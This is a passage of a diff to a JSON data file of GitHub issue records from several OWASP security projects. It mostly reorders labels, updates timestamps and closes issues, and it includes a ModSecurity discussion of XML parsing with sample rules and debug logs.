+56378,9 @@ 855 ], "labels": [ - 340, 344, - 346 + 346, + 340 ] } }, @@ -56384,7 +56389,7 @@ "pk": 1846, "fields": { "nest_created_at": "2024-09-11T22:13:14.147Z", - "nest_updated_at": "2024-09-18T18:22:08.897Z", + "nest_updated_at": "2024-09-22T18:31:06.041Z", "node_id": "MDU6SXNzdWU0NzY5NTUxMDc=", "title": "Upgrade dependencies", "body": "### Context\r\n- This is part of `release-1.5` #148 \r\n- Context from #82 \r\n- Critical task\r\n\r\n### Tasks\r\n- [ ] Upgrade dependencies to secure latest versions in `package.json`\r\n- [ ] Validate the instalation with the local test\r\n- [ ] Add and submit the changes in `package-lock.json`\r\n- [ ] Add the primary depdency list to the `readme.md`\r\n- [ ] Check that the npm tasks are working as expected\r\n- [ ] Update the `readme.md` with the extra relevant info (if needed)\r\n\r\n### Assignation\r\n- This tasks is open for assignation, just claim it (as reply to this) and submit your PR ;-)\r\n\r\n### Important\r\n- Check the current roadmap #148\r\n- Don't forget to check the [Contributing Guidelines](https://github.com/OWASP/NodeGoat/blob/master/CONTRIBUTING.md) and follow the [Code of Conduct](https://github.com/OWASP/NodeGoat/blob/master/CONTRIBUTING.md)", @@ -56406,8 +56411,8 @@ "assignees": [], "labels": [ 340, - 346, 347, + 346, 348, 349 ] @@ -56442,9 +56447,9 @@ 562 ], "labels": [ - 340, 344, - 346 + 346, + 340 ] } }, @@ -56476,9 +56481,9 @@ 562 ], "labels": [ - 340, 344, - 345 + 345, + 340 ] } }, @@ -56510,9 +56515,9 @@ 857 ], "labels": [ - 340, 344, - 346 + 346, + 340 ] } }, @@ -56961,8 +56966,8 @@ "repository": 1179, "assignees": [], "labels": [ - 351, - 352 + 352, + 351 ] } }, @@ -57094,7 +57099,7 @@ "pk": 1869, "fields": { "nest_created_at": "2024-09-11T22:14:00.474Z", - "nest_updated_at": "2024-09-18T19:06:37.744Z", + "nest_updated_at": "2024-09-22T19:39:13.525Z", "node_id": "I_kwDOANHRJM6Ors5a", "title": "Add hackmanit template injection playground ", "body": "https://github.com/Hackmanit/template-injection-playground\r\n\r\nDocker\r\n\r\nVarious template engines ", @@ -57367,8 +57372,8 @@ 862 ], "labels": [ - 358, - 362 + 362, + 358 ] } }, @@ -57456,9 +57461,9 @@ 862 ], "labels": [ + 363, 356, - 358, - 363 + 358 ] } }, @@ -58537,7 +58542,7 @@ "pk": 1919, "fields": { "nest_created_at": "2024-09-11T22:15:11.107Z", - "nest_updated_at": "2024-09-18T18:22:28.969Z", + "nest_updated_at": "2024-09-22T18:32:03.669Z", "node_id": "MDU6SXNzdWU3MDkyNjM3OA==", "title": "Document how to install in Azure", "body": "1) Fork this repo (https://github.com/OWASP/DotNet_ANSA)\n2) open Azure portal\n3) Create website\n4) Using azure GitHub Integration, chose this site\n5) Wait for deployment\n![image](https://cloud.githubusercontent.com/assets/656739/7333433/992cd18e-eb67-11e4-9df8-776d6768689b.png)\n\n6) Browse website:\nhttp://dotnet-ansa.azurewebsites.net\n![image](https://cloud.githubusercontent.com/assets/656739/7333442/eb3bdb78-eb67-11e4-9240-9263eb9a0191.png)\n\n![image](https://cloud.githubusercontent.com/assets/656739/7333445/04a4b666-eb68-11e4-886d-f56bac98b427.png)\nhttp://dotnet-ansa.azurewebsites.net/ANSA_V0_31b/\nhttp://dotnet-ansa.azurewebsites.net/ANBS_V0_55/ANBSFiles/\n![image](https://cloud.githubusercontent.com/assets/656739/7333451/164f6a14-eb68-11e4-97da-b9c82a299f47.png)\n", @@ -58801,7 +58806,7 @@ "pk": 1928, "fields": { "nest_created_at": "2024-09-11T22:15:35.924Z", - "nest_updated_at": "2024-09-18T18:22:43.398Z", + "nest_updated_at": "2024-09-22T18:32:20.128Z", "node_id": "MDU6SXNzdWUxNTQ3MTEyNDE=", "title": "Is this project still maintained?", "body": "Hi,\n\nIt doesn't look like there's been much activity recently.\n\nI'm planning a cloud service which plugs into GitHub to check NuGet dependencies, but I don't want to re-invent there wheel or duplicate what you have here.\n\nBest,\nKevin.\n", @@ -58971,7 +58976,7 @@ "pk": 1934, "fields": { "nest_created_at": "2024-09-11T22:15:45.203Z", - "nest_updated_at": "2024-09-18T18:22:47.191Z", + "nest_updated_at": "2024-09-22T18:32:25.133Z", "node_id": "MDU6SXNzdWUxNTI2Mzk5NQ==", "title": "Add support for ASP.NET MVC", "body": "Since that will introduce a number of other vulnerabilities and it will be good to have the multiple ways to do ASP.NET web pages side-by-side \n", @@ -59279,7 +59284,7 @@ "pk": 1945, "fields": { "nest_created_at": "2024-09-11T22:15:58.322Z", - "nest_updated_at": "2024-09-18T18:22:50.989Z", + "nest_updated_at": "2024-09-22T18:32:29.951Z", "node_id": "MDU6SXNzdWUxMTk1NzE2MDg=", "title": "update for phpsec.owasp.org?", "body": "Given the new state of this project, I'd suggest that the related website, phpsec.owasp.org, be updated to point out the project is deprecated and that any information there is for reference only. It should also mention that the software is no longer available except in archive.\n", @@ -59744,8 +59749,8 @@ "repository": 1190, "assignees": [], "labels": [ - 367, - 369 + 369, + 367 ] } }, @@ -59990,7 +59995,7 @@ "pk": 1969, "fields": { "nest_created_at": "2024-09-11T22:16:38.154Z", - "nest_updated_at": "2024-09-18T18:22:58.831Z", + "nest_updated_at": "2024-09-22T18:32:51.441Z", "node_id": "MDU6SXNzdWUxMDM4NDU0MA==", "title": "Should the SSVL be called OSVL or even OSVS?", "body": "SSVL = Simple Software Vulnerability Language \nOSVL = Open Software Vulnerability Language\nOSVS = Open Software Vulnerability Schema\n", @@ -60488,7 +60493,7 @@ "pk": 1986, "fields": { "nest_created_at": "2024-09-11T22:17:27.836Z", - "nest_updated_at": "2024-09-18T18:23:10.104Z", + "nest_updated_at": "2024-09-22T18:33:08.074Z", "node_id": "MDU6SXNzdWU4MDYzNzQ4MA==", "title": "Is this still alive? and where the latest version of AppSensor content is?", "body": "Also is there a GitHub issue list for AppSensor? \n\nI find GitHub a much better way to ask technical questions (and log its answers)\n", @@ -60546,7 +60551,7 @@ "pk": 1988, "fields": { "nest_created_at": "2024-09-11T22:17:54.909Z", - "nest_updated_at": "2024-09-18T18:23:28.692Z", + "nest_updated_at": "2024-09-22T18:33:35.509Z", "node_id": "MDU6SXNzdWU0ODE5NTY0Nw==", "title": "GUI: section where to create menu does not work", "body": "In the GUI OPtions there is the Load File Menu where you can select in which section (i.e. Decoding, IP, etc.) the menu should be created. This selection does not work.\n", @@ -60599,8 +60604,8 @@ 929 ], "labels": [ - 375, - 376 + 376, + 375 ] } }, @@ -60908,23 +60913,23 @@ "pk": 2000, "fields": { "nest_created_at": "2024-09-11T22:33:09.438Z", - "nest_updated_at": "2024-09-11T22:33:09.438Z", + "nest_updated_at": "2024-09-22T07:35:49.108Z", "node_id": "I_kwDOG83Tvs6Rh43L", "title": "Modularize detector/analyzer and other source codes", "body": "e.g `DetectorGoEcho` -> `Detector::Go::Echo`", "summary": "Modularize the detector and analyzer code by restructuring the existing classes and files into a more organized namespace format. Transform `DetectorGoEcho` into `Detector::Go::Echo` to enhance clarity and maintainability within the codebase. Implement this refactoring throughout the relevant source codes to promote a consistent modular architecture.", "hint": "Certainly! Here are possible steps to modularize the `DetectorGoEcho` code into a more structured format like `Detector::Go::Echo`:\n\n1. **Understand Current Code Structure**: Analyze the existing `DetectorGoEcho` code to understand its functionality, dependencies, and how it interacts with other components.\n\n2. **Define the Modular Structure**: Determine the desired modular structure. Create a plan for the hierarchy, such as defining `Detector`, `Go`, and `Echo` as distinct modules or classes.\n\n3. **Create Module/Namespace**: Set up the new directories or files for the modules. Create a `Detector` module and submodules `Go` and `Echo`.\n\n4. **Refactor Code**: Begin refactoring the existing code by moving the relevant sections into the appropriate modules. Ensure to maintain functionality while doing this.\n\n5. **Update Class and Method Names**: Change the class name from `DetectorGoEcho` to `Detector::Go::Echo` and update any method names to reflect the new structure.\n\n6. **Adjust Dependencies**: Modify any dependencies or import statements throughout the codebase to reference the new module structure.\n\n7. **Implement Unit Tests**: Write unit tests for the new modules to ensure that they work as expected after the refactoring.\n\n8. **Run Tests**: Execute the unit tests to verify functionality and check for any broken references or issues introduced during the refactoring.\n\n9. **Update Documentation**: Revise any existing documentation to reflect the new modular structure, including usage examples and API references.\n\n10. **Review and Optimize**: Conduct a code review to identify further optimization opportunities and ensure adherence to coding standards, and finalize the implementation.\n\nBy following these steps, you can effectively modularize the code while preserving its functionality and improving maintainability.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/owasp-noir/noir/issues/379", "number": 379, "sequence_id": 2441579979, "is_locked": false, "lock_reason": "", "comments_count": 0, - "closed_at": null, + "closed_at": "2024-09-21T15:49:12Z", "created_at": "2024-08-01T06:16:49Z", - "updated_at": "2024-08-01T14:53:37Z", + "updated_at": "2024-09-21T15:49:12Z", "author": 929, "repository": 1206, "assignees": [ @@ -60968,23 +60973,23 @@ "pk": 2002, "fields": { "nest_created_at": "2024-09-11T22:33:11.878Z", - "nest_updated_at": "2024-09-14T19:33:27.134Z", + "nest_updated_at": "2024-09-22T07:35:50.124Z", "node_id": "I_kwDOG83Tvs6UfSeu", "title": "Add path param in endpoint", "body": "", "summary": "Implement a path parameter in the specified endpoint to enhance its functionality. Ensure that the parameter is correctly parsed and utilized within the endpoint's logic to allow for dynamic resource handling. Update the documentation to reflect the changes made to the endpoint's structure and usage.", "hint": "To add a path parameter to an endpoint, follow these steps:\n\n1. **Identify the Endpoint**: Determine the endpoint where you want to add the path parameter. For example, `/users` might be the endpoint for user-related operations.\n\n2. **Define the Parameter**: Decide what the path parameter will represent. For example, if you're adding a user ID, it could be represented as `/{userId}`.\n\n3. **Update the Route Definition**: Modify the route definition in your code to include the path parameter. For example, change the route from `/users` to `/users/{userId}`.\n\n4. **Update the Controller Logic**: Adjust the corresponding controller function to accept the new parameter. Ensure you can access it within the function.\n\n5. **Modify Functionality**: Implement necessary logic to handle the new path parameter. This may involve fetching data based on the provided parameter.\n\n6. **Update API Documentation**: Reflect the changes in your API documentation, specifying the new path parameter and its purpose.\n\n7. **Test the Endpoint**: Write tests or use tools like Postman to verify that the endpoint works as expected with the new path parameter.\n\n8. **Handle Edge Cases**: Consider scenarios like invalid parameters or non-existent resources and implement error handling.\n\n9. **Code Review**: Have your changes reviewed by peers to ensure quality and adherence to coding standards.\n\n10. **Deploy Changes**: Once everything is verified and approved, deploy your changes to the production environment.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/owasp-noir/noir/issues/389", "number": 389, "sequence_id": 2491230126, "is_locked": false, "lock_reason": "", "comments_count": 0, - "closed_at": null, + "closed_at": "2024-09-22T06:03:32Z", "created_at": "2024-08-28T06:55:44Z", - "updated_at": "2024-08-28T06:57:22Z", + "updated_at": "2024-09-22T06:03:32Z", "author": 929, "repository": 1206, "assignees": [ @@ -61081,9 +61086,9 @@ "repository": 1210, "assignees": [], "labels": [ + 384, 381, - 383, - 384 + 383 ] } }, @@ -61113,8 +61118,8 @@ "repository": 1210, "assignees": [], "labels": [ - 381, - 385 + 385, + 381 ] } }, @@ -61144,8 +61149,8 @@ "repository": 1210, "assignees": [], "labels": [ - 381, - 385 + 385, + 381 ] } }, @@ -61175,9 +61180,9 @@ "repository": 1210, "assignees": [], "labels": [ - 381, 384, - 385 + 385, + 381 ] } }, @@ -61207,9 +61212,9 @@ "repository": 1210, "assignees": [], "labels": [ - 382, 386, - 387 + 387, + 382 ] } }, @@ -61239,9 +61244,9 @@ "repository": 1210, "assignees": [], "labels": [ + 388, 381, - 382, - 388 + 382 ] } }, @@ -61482,8 +61487,8 @@ "repository": 1210, "assignees": [], "labels": [ - 381, - 388 + 388, + 381 ] } }, @@ -61544,8 +61549,8 @@ "repository": 1210, "assignees": [], "labels": [ - 381, - 388 + 388, + 381 ] } }, @@ -61977,9 +61982,9 @@ 933 ], "labels": [ - 383, + 393, 386, - 393 + 383 ] } }, @@ -62198,23 +62203,23 @@ "pk": 2042, "fields": { "nest_created_at": "2024-09-11T22:35:00.061Z", - "nest_updated_at": "2024-09-11T22:35:00.061Z", + "nest_updated_at": "2024-09-20T17:47:28.832Z", "node_id": "I_kwDOJ9oh6M6SYMC5", "title": "Provide vulnerability database as csv files", "body": "The tables:\r\n\r\n1. affected_components\r\n2. cpe_matches\r\n3. cve_affected_component\r\n4. cve_cpe_match\r\n5. cves\r\n6. cwes\r\n7. exploits\r\n8. weaknesses\r\n\r\nshould be provided as csv files in **a single compressed zip file in the github container registry**. A lot of it is already done in the: .github/workflows/vulndb.yaml file.\r\n\r\nWhat needs to be done is:\r\n\r\n1. Check if the right tables are exported (the script is rather outdated)\r\n2. The tables should be exported as **CSV** files, not sql.\r\n3. The csv files should be compressed into a single .zip archive\r\n4. The data should be pushed into the ghcr (already done!)\r\n5. A checksum of the data should be signed and pushed into the registry as well (https://docs.sigstore.dev/signing/signing_with_blobs/#signing-with-a-key) (${{ secrets.COSIGN_PRIVATE_KEY }})\r\n\r\nAfter that:\r\n\r\n1. Create a vulndb import command (which just executes a changed Mirror function)\r\n2. The command should download the csv files\r\n3. The command should verify the checksum of the .zip archive\r\n4. The command should insert all the data", "summary": "Export vulnerability database tables as CSV files and compress them into a single zip file for the GitHub container registry. Ensure the right tables are included, update the outdated script, and implement checksum signing using the provided private key. Develop a command to download the CSV files, verify the checksum, and insert all data into the database.", "hint": "To approach the problem of providing the vulnerability database as CSV files in a compressed zip file in the GitHub Container Registry, follow these steps:\n\n1. **Review the Existing Workflow**: Examine the `.github/workflows/vulndb.yaml` file to understand the current implementation and determine how the tables are exported and what changes are needed.\n\n2. **Identify Required Tables**: Confirm that all specified tables (`affected_components`, `cpe_matches`, `cve_affected_component`, `cve_cpe_match`, `cves`, `cwes`, `exploits`, `weaknesses`) are included in the export process. Compare with the latest requirements.\n\n3. **Update Export Script**: Modify the existing script to ensure that it exports the identified tables as **CSV** files instead of SQL files. This may involve changing the export format in the database query or output handling.\n\n4. **Implement Zip Compression**: After exporting the CSV files, implement a step to compress them into a single `.zip` archive. This can be done using utilities like `zip` or through a library in the programming language used.\n\n5. **Ensure Data Push to GHCR**: Confirm that the workflow already includes a step to push the compressed zip file into the GitHub Container Registry (GHCR). If not, add the necessary commands to do so.\n\n6. **Generate Checksum**: Generate a checksum (e.g., SHA256) of the zipped CSV file. Ensure that this checksum is calculated correctly and is ready for signing.\n\n7. **Sign the Checksum**: Utilize the provided `${{ secrets.COSIGN_PRIVATE_KEY }}` to sign the checksum of the zip file as per the guidelines from the Sigstore documentation. Ensure this step is integrated into the workflow.\n\n8. **Push Checksum to GHCR**: Add a step in the workflow to push the signed checksum into the GitHub Container Registry alongside the zipped CSV file.\n\n9. **Develop `vulndb import` Command**: Create a new command called `vulndb import` that incorporates the necessary functions to download the CSV files and execute the import process.\n\n10. **Implement Verification and Insertion**: Within the `vulndb import` command, include logic to download the zip file, verify the checksum, and then insert all the data from the CSV files into the database, ensuring error handling and logging are included for robustness.\n\nFollowing these steps should help you successfully address the requirements of the vulnerability database project.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/l3montree-dev/devguard/issues/152", "number": 152, "sequence_id": 2455814329, "is_locked": false, "lock_reason": "", "comments_count": 0, - "closed_at": null, + "closed_at": "2024-09-19T14:36:35Z", "created_at": "2024-08-08T13:28:12Z", - "updated_at": "2024-08-08T13:28:36Z", + "updated_at": "2024-09-19T14:36:35Z", "author": 932, "repository": 1210, "assignees": [ @@ -62292,23 +62297,23 @@ "pk": 2045, "fields": { "nest_created_at": "2024-09-11T22:35:05.208Z", - "nest_updated_at": "2024-09-18T18:52:24.204Z", + "nest_updated_at": "2024-09-20T17:47:30.150Z", "node_id": "I_kwDOJ9oh6M6VzRk_", "title": "Add organization overview", "body": "", "summary": "Implement an organization overview feature that provides a comprehensive summary of the organization's structure, including key metrics, member roles, and project statuses. Ensure the overview is dynamically updated to reflect real-time changes and integrates seamlessly with existing dashboards. Prioritize user-friendly design and accessibility to enhance usability across different devices.", "hint": "1. **Define Purpose**: Determine the main objectives of the organization overview, such as informing stakeholders, attracting investors, or guiding new employees.\n\n2. **Gather Information**: Collect essential data about the organization, including its history, mission, vision, values, and key achievements.\n\n3. **Identify Target Audience**: Understand who will be reading the overview to tailor the content appropriately (e.g., potential clients, partners, employees).\n\n4. **Outline Structure**: Create a clear structure for the overview, including sections like introduction, history, mission, services/products, market position, and future goals.\n\n5. **Draft Content**: Write concise and engaging content for each section, ensuring clarity and relevance to the audience.\n\n6. **Incorporate Visuals**: Consider including graphs, charts, or images to enhance understanding and engagement.\n\n7. **Review and Edit**: Proofread the draft for clarity, coherence, and grammatical accuracy. Seek feedback from colleagues or stakeholders.\n\n8. **Finalize Design**: Format the overview in a visually appealing way, considering layout, font, and colors that align with the organization’s branding.\n\n9. **Distribute**: Share the overview through appropriate channels (e.g., website, presentations, brochures) to reach the intended audience.\n\n10. **Solicit Feedback**: After distribution, gather feedback to assess the effectiveness of the overview and identify areas for improvement in future iterations.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/l3montree-dev/devguard/issues/160", "number": 160, "sequence_id": 2513246527, "is_locked": false, "lock_reason": "", "comments_count": 0, - "closed_at": null, + "closed_at": "2024-09-19T14:34:20Z", "created_at": "2024-09-09T08:15:14Z", - "updated_at": "2024-09-09T08:15:15Z", + "updated_at": "2024-09-19T14:34:20Z", "author": 934, "repository": 1210, "assignees": [ @@ -62415,10 +62420,10 @@ 939 ], "labels": [ + 400, 396, 398, - 399, - 400 + 399 ] } }, @@ -62451,8 +62456,8 @@ 940 ], "labels": [ - 396, - 401 + 401, + 396 ] } }, @@ -62484,10 +62489,10 @@ 939 ], "labels": [ + 402, 397, 398, - 399, - 402 + 399 ] } }, @@ -62624,8 +62629,8 @@ 940 ], "labels": [ - 399, - 402 + 402, + 399 ] } }, @@ -62721,9 +62726,9 @@ "repository": 1213, "assignees": [], "labels": [ + 402, 396, - 397, - 402 + 397 ] } }, @@ -62755,10 +62760,10 @@ 939 ], "labels": [ + 408, 396, 397, - 398, - 408 + 398 ] } }, @@ -62822,9 +62827,9 @@ 939 ], "labels": [ + 402, 396, - 398, - 402 + 398 ] } }, @@ -62854,9 +62859,9 @@ "repository": 1213, "assignees": [], "labels": [ + 407, 396, - 399, - 407 + 399 ] } }, @@ -62921,9 +62926,9 @@ 939 ], "labels": [ - 396, 401, - 402 + 402, + 396 ] } }, @@ -62955,9 +62960,9 @@ 940 ], "labels": [ - 398, 400, - 401 + 401, + 398 ] } }, @@ -62989,9 +62994,9 @@ 940 ], "labels": [ + 402, 396, - 398, - 402 + 398 ] } }, @@ -63090,8 +63095,8 @@ 940 ], "labels": [ - 396, - 409 + 409, + 396 ] } }, @@ -63121,10 +63126,10 @@ "repository": 1213, "assignees": [], "labels": [ - 397, 402, - 410, - 411 + 411, + 397, + 410 ] } }, @@ -63229,9 +63234,9 @@ 940 ], "labels": [ + 411, 396, - 398, - 411 + 398 ] } }, @@ -63326,9 +63331,9 @@ "repository": 1213, "assignees": [], "labels": [ + 402, 396, 397, - 402, 407 ] } @@ -63393,8 +63398,8 @@ "repository": 1213, "assignees": [], "labels": [ - 396, 402, + 396, 407 ] } @@ -63425,9 +63430,9 @@ "repository": 1213, "assignees": [], "labels": [ + 402, 396, - 397, - 402 + 397 ] } }, @@ -63487,9 +63492,9 @@ "repository": 1213, "assignees": [], "labels": [ + 402, 396, - 397, - 402 + 397 ] } }, @@ -63519,9 +63524,9 @@ "repository": 1213, "assignees": [], "labels": [ + 402, 396, 397, - 402, 407 ] } @@ -63554,8 +63559,8 @@ 939 ], "labels": [ - 407, - 412 + 412, + 407 ] } }, @@ -63587,8 +63592,8 @@ 939 ], "labels": [ - 407, - 412 + 412, + 407 ] } }, @@ -63621,9 +63626,9 @@ 940 ], "labels": [ + 408, 396, - 398, - 408 + 398 ] } }, @@ -63655,8 +63660,8 @@ 939 ], "labels": [ - 397, - 402 + 402, + 397 ] } }, @@ -63686,9 +63691,9 @@ "repository": 1213, "assignees": [], "labels": [ + 402, 396, - 397, - 402 + 397 ] } }, @@ -63720,10 +63725,10 @@ 940 ], "labels": [ - 396, - 398, 401, - 413 + 396, + 413, + 398 ] } }, @@ -63755,8 +63760,8 @@ 939 ], "labels": [ - 398, - 409 + 409, + 398 ] } }, @@ -63788,10 +63793,10 @@ 940 ], "labels": [ + 407, 397, 398, - 399, - 407 + 399 ] } }, @@ -63821,8 +63826,8 @@ "repository": 1213, "assignees": [], "labels": [ - 396, 402, + 396, 407 ] } @@ -63855,9 +63860,9 @@ 939 ], "labels": [ + 407, 396, - 399, - 407 + 399 ] } }, @@ -63921,9 +63926,9 @@ 939 ], "labels": [ - 399, 407, - 412 + 412, + 399 ] } }, @@ -63955,8 +63960,8 @@ 939 ], "labels": [ - 398, - 408 + 408, + 398 ] } }, @@ -63988,9 +63993,9 @@ 939 ], "labels": [ - 399, 407, - 410 + 410, + 399 ] } }, @@ -64023,10 +64028,10 @@ 940 ], "labels": [ - 399, - 402, 407, - 414 + 402, + 414, + 399 ] } }, @@ -64058,8 +64063,8 @@ 939 ], "labels": [ - 399, - 414 + 414, + 399 ] } }, @@ -64089,8 +64094,8 @@ "repository": 1213, "assignees": [], "labels": [ - 398, - 401 + 401, + 398 ] } }, @@ -64154,8 +64159,8 @@ 940 ], "labels": [ - 398, - 401 + 401, + 398 ] } }, @@ -64219,10 +64224,10 @@ 940 ], "labels": [ - 396, - 398, 401, - 409 + 409, + 396, + 398 ] } }, @@ -64287,9 +64292,9 @@ 940 ], "labels": [ - 398, 401, - 409 + 409, + 398 ] } }, @@ -64354,9 +64359,9 @@ 940 ], "labels": [ - 398, 401, - 409 + 409, + 398 ] } }, @@ -64390,8 +64395,8 @@ ], "labels": [ 396, - 398, - 413 + 413, + 398 ] } }, @@ -64424,8 +64429,8 @@ 940 ], "labels": [ - 398, - 403 + 403, + 398 ] } }, @@ -64557,8 +64562,8 @@ 939 ], "labels": [ - 399, - 411 + 411, + 399 ] } }, @@ -64718,10 +64723,10 @@ 940 ], "labels": [ - 399, 400, 404, - 413 + 413, + 399 ] } }, @@ -64914,8 +64919,8 @@ 939 ], "labels": [ - 398, - 403 + 403, + 398 ] } }, @@ -64947,9 +64952,9 @@ 977 ], "labels": [ + 409, 396, - 399, - 409 + 399 ] } }, @@ -64979,9 +64984,9 @@ "repository": 1213, "assignees": [], "labels": [ - 399, + 409, 404, - 409 + 399 ] } }, @@ -65013,8 +65018,8 @@ 977 ], "labels": [ - 398, - 400 + 400, + 398 ] } }, @@ -65109,8 +65114,8 @@ 977 ], "labels": [ - 399, - 411 + 411, + 399 ] } }, @@ -65267,8 +65272,8 @@ "repository": 1213, "assignees": [], "labels": [ - 399, - 415 + 415, + 399 ] } }, @@ -65395,8 +65400,8 @@ "repository": 1213, "assignees": [], "labels": [ - 398, - 401 + 401, + 398 ] } }, @@ -65687,9 +65692,9 @@ "repository": 1213, "assignees": [], "labels": [ - 398, 400, - 403 + 403, + 398 ] } }, @@ -65721,8 +65726,8 @@ 939 ], "labels": [ - 399, - 409 + 409, + 399 ] } }, @@ -65907,8 +65912,8 @@ "repository": 1213, "assignees": [], "labels": [ - 398, - 401 + 401, + 398 ] } }, @@ -66234,8 +66239,8 @@ "repository": 1213, "assignees": [], "labels": [ - 398, - 414 + 414, + 398 ] } }, @@ -66295,8 +66300,8 @@ "repository": 1213, "assignees": [], "labels": [ - 398, - 401 + 401, + 398 ] } }, @@ -66386,8 +66391,8 @@ "repository": 1213, "assignees": [], "labels": [ - 398, - 403 + 403, + 398 ] } }, @@ -66417,8 +66422,8 @@ "repository": 1213, "assignees": [], "labels": [ - 399, - 404 + 404, + 399 ] } }, @@ -66448,9 +66453,9 @@ "repository": 1213, "assignees": [], "labels": [ - 398, 400, - 403 + 403, + 398 ] } }, @@ -66480,9 +66485,9 @@ "repository": 1213, "assignees": [], "labels": [ + 416, 398, - 399, - 416 + 399 ] } }, @@ -66512,8 +66517,8 @@ "repository": 1213, "assignees": [], "labels": [ - 398, - 403 + 403, + 398 ] } }, @@ -66543,9 +66548,9 @@ "repository": 1213, "assignees": [], "labels": [ - 398, 400, - 403 + 403, + 398 ] } }, @@ -66575,8 +66580,8 @@ "repository": 1213, "assignees": [], "labels": [ - 398, - 403 + 403, + 398 ] } }, @@ -66636,8 +66641,8 @@ "repository": 1213, "assignees": [], "labels": [ - 399, - 404 + 404, + 399 ] } }, @@ -66728,8 +66733,8 @@ "repository": 1213, "assignees": [], "labels": [ - 398, - 400 + 400, + 398 ] } }, @@ -66818,8 +66823,8 @@ "repository": 1213, "assignees": [], "labels": [ - 398, 403, + 398, 415 ] } @@ -66850,8 +66855,8 @@ "repository": 1213, "assignees": [], "labels": [ - 398, - 400 + 400, + 398 ] } }, @@ -66909,8 +66914,8 @@ "repository": 1213, "assignees": [], "labels": [ - 398, - 403 + 403, + 398 ] } }, @@ -67115,8 +67120,8 @@ "repository": 1213, "assignees": [], "labels": [ - 399, - 400 + 400, + 399 ] } }, @@ -67266,8 +67271,8 @@ "repository": 1213, "assignees": [], "labels": [ - 399, - 400 + 400, + 399 ] } }, @@ -67539,8 +67544,8 @@ 976 ], "labels": [ - 399, - 400 + 400, + 399 ] } }, @@ -67818,11 +67823,11 @@ 976 ], "labels": [ + 418, + 419, 398, 399, - 400, - 418, - 419 + 400 ] } }, @@ -67976,8 +67981,8 @@ 976 ], "labels": [ - 399, - 418 + 418, + 399 ] } }, @@ -68067,8 +68072,8 @@ "repository": 1213, "assignees": [], "labels": [ - 398, - 403 + 403, + 398 ] } }, @@ -68167,7 +68172,7 @@ "pk": 2229, "fields": { "nest_created_at": "2024-09-11T22:41:26.979Z", - "nest_updated_at": "2024-09-16T21:14:03.197Z", + "nest_updated_at": "2024-09-20T17:48:24.533Z", "node_id": "I_kwDOABQmks6N7eYo", "title": "Discussion of the new XML processing feature", "body": "**Describe the bug**\r\n\r\nIt's not a bug but a discussion about a new feature, how can we extend the XML processing.\r\n\r\nThere is a feature request from a customer that we should extend the engines' XML parsing capability. Of course, we should add this request to both engine with same behavior.\r\n\r\n## Current behavior\r\n\r\nConsider this payload:\r\n\r\n```XML\r\n\r\n\r\n \r\n \r\n foo1\r\n bar1\r\n \r\n \r\n foo2\r\n bar2\r\n \r\n \r\n\r\n```\r\n\r\nThis payload will appear in current state in the engines:\r\n\r\n(mod_security2)\r\n```\r\n[/post][9] Target value: \" foo1 bar1 foo2 bar2\"\r\n```\r\n(libmodsecurity3)\r\n```\r\n[/post] [9] Target value: \" foo1 bar1 foo2 bar2\" (Variable: XML:/*)\r\n```\r\n(lines from debug.logs)\r\n\r\n## Problem\r\n\r\nThe problem is that exclusions for sub-parts and specific nodes does not work. See the example:\r\n\r\n```\r\nSecRule XML:/* \"@rx ^foo.*\" \\\r\n\t\"id:10001,\\\r\n\tphase:2,\\\r\n\tt:none,\\\r\n\tlog,\\\r\n\tpass,\\\r\n\tctl:ruleRemoveTargetById=930120;XML:/level1/level2/node\"\r\n```\r\n\r\nbecause the XML variable holds the **concatenated node values**, not a key:value pairs like JSON. Therefore it's impossible to create any exclusion against any rules.\r\n\r\n## Possible solution\r\n\r\nConsider this converted strcture (XML to JSON):\r\n\r\n```JSON\r\n{\r\n \"root\": {\r\n \"level1\": {\r\n \"level2\": [\r\n {\r\n \"node\": [\r\n \"foo1\",\r\n \"bar1\"\r\n ]\r\n },\r\n {\r\n \"node\": [\r\n \"foo2\",\r\n \"bar2\"\r\n ]\r\n }\r\n ]\r\n }\r\n }\r\n}\r\n```\r\n\r\nThis payload will expanded like this:\r\n\r\n(mod_security2)\r\n```\r\n[/post][9] Adding JSON argument 'root.level1.level2.level2.node.node' with value 'foo1'\r\n[/post][9] Adding JSON argument 'root.level1.level2.level2.node.node' with value 'bar1'\r\n[/post][9] Adding JSON argument 'root.level1.level2.level2.node.node' with value 'foo2'\r\n[/post][9] Adding JSON argument 'root.level1.level2.level2.node.node' with value 'bar2'\r\n```\r\n(libmodsecurity3)\r\n```\r\n[/post] [4] Adding request argument (JSON): name \"json.root.level1.level2.array_0.node.array_0\", value \"foo1\"\r\n[/post] [4] Adding request argument (JSON): name \"json.root.level1.level2.array_0.node.array_1\", value \"bar1\"\r\n[/post] [4] Adding request argument (JSON): name \"json.root.level1.level2.array_1.node.array_0\", value \"foo2\"\r\n[/post] [4] Adding request argument (JSON): name \"json.root.level1.level2.array_1.node.array_1\", value \"bar2\"\r\n```\r\n\r\n**The idea is to transform the XML structure in a similar way.**\r\n\r\nExample:\r\n\r\n(libmodsecurity3)\r\n```\r\n[/post] [4] Adding request argument (XML): name \"xml.root.level1.level2.array_0.node.array_0\", value \"foo1\"\r\n[/post] [4] Adding request argument (XML): name \"xml.root.level1.level2.array_0.node.array_1\", value \"bar1\"\r\n[/post] [4] Adding request argument (XML): name \"xml.root.level1.level2.array_1.node.array_0\", value \"foo2\"\r\n[/post] [4] Adding request argument (XML): name \"xml.root.level1.level2.array_1.node.array_1\", value \"bar2\"\r\n```\r\n\r\n## Possible risks\r\n\r\n* if we introduce this \"new\" collection under an existing one, then it will causes false positive matches\r\n* cost of parsing an XML structure is very high\r\n\r\n## How can we avoid/handle the risks?\r\n\r\nWe can put the decision in the hands of the user, whether he wants to see the new collection under the `ARGS` or not - so introduce a new configuration keyword, eg. `SecParseXMLintoArgs` (consider the optional runtime config, eg. `ctl:parseXMLintoArgs`)\r\n\r\nAs in case of JSON, introduce a new configuration keyword which controls the maximum number of XML levels that can be analyzed, eg. `SecRequestBodyXMLDepthLimit` (see 